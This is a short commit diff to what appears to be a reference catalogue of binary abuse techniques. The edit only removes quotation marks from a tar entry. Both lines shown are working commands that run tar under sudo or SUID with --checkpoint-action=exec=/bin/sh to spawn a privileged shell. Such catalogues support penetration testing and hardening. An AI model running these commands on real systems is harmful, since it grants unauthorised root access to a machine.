Coherence in tar code

This commit is contained in:
Andrea Cardaci 2018-05-25 01:03:51 +02:00
parent e885d4a6ee
commit da0b49a840

View File

@ -5,5 +5,5 @@ functions:
sudo-enabled:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
suid-limited:
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh"
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
---